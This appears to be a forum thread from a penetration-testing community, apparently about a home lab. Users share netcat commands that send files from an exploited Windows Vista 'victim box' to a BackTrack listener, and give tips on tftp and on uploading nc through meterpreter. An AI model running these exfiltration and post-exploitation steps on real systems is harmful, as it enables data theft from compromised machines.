So nice of you KMDave. I have a tiny update on nc command.

And on the command shell (to send the file from Vista Box):
    Code:
    nc 192.168.1.4 10000 < xxxx.txt
xxxx.txt was in the same directory with nc.exe in the victim box and after receiving the file BT3 saves it under root directory.
I found that the file can be transferred from any location (instead of only from nc folder) to any location in the BT3 box (instead of root) as long as correct file path is provided. To receive the file in BT3 box to yyyy directory in root:
    Code:
    nc -vv -l -p 10000 > /root/yyyy/xxxx.txt
To send the file from zzzz folder within C drive of Vista Box:
    Code:
    nc 192.168.1.4 10000 < C:\zzzz\xxxx.txt
    Thanks everybody

Well, ftp will break the shell so you should stick to tftp.
Did you activate the tftp client on your exploited windows box and start the tftp daemon on your bt box?

Why not uploading nc while having a connection through the meterpreter?

this one worked locally..... tftp was up......... then my goal was to run it remotely....
My stupid plan: I tried to uninstall the program, didn't work, so I deleted the "tftp.exe" file from system32 folder. Now, it's gone forever.. forget about the remote installation, the local command is no longer working.... I wish I had a backup
